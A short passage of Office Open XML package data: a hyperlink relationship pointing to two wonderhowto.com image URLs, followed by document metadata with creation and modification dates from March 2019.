Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/37/11/63519198544540/0/635191985445403711.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img.wonderhowto.com/img/original/85/52/63519442954880/0/635194429548808552.jpg"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2019-03-15T06:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-22T21:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>